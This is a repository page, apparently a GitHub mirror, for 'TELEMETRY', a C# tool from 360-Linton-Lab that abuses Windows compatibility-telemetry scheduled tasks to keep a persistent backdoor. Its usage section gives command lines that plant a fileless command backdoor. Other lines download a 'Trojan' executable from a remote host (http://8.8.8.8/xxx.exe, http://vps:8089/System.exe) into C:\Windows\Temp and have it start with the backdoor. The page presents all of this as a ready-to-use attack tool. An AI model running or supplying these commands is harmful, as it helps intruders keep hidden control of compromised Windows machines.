Need help with Telemetry?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

360-Linton-Lab
160 Stars 27 Forks 6 Commits 0 Opened issues

Description

WINDOWS TELEMETRY权限维持

Services available

!
?

Need anything else?

Contributors list

TELEMETRY

Background

TELEMETRY is a C# For Windows PERSISTENCE

Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.

  • Local admin rights to install (requires the ability to write to HKLM)
  • Have CompatTelRunner.exe
  • 2008R2/Windows 7 through 2019/Windows 10

Advantage

  • Using the system's own Telemetry planned tasks
  • Only registry suspicious backdoor troubleshooting

Command Line Usage

    ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
                                             .Imanfeng
    Features:
        Install:   -   Deployment authority maintains backdoor

Command:
    TELEMETRY.exe install /command:calc
    -   Execute command without file backdoor

    TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
    -   Remotely download Trojan files to the specified directory for backdoor startup

    TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
    -   Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup

    TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
    -   Set path Trojan files for backdoor startup

Parameter:
    /command: -   Execute Command
    /url:     -   Download FROM
    /path:    -   Download To

  • Execute command without file backdoor
  Telemetry.exe install /command:calc

1

  • Remotely download Trojan files for backdoor startup
  Telemetry.exe install /url:http://vps:8089/System.exe

2

Learn

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.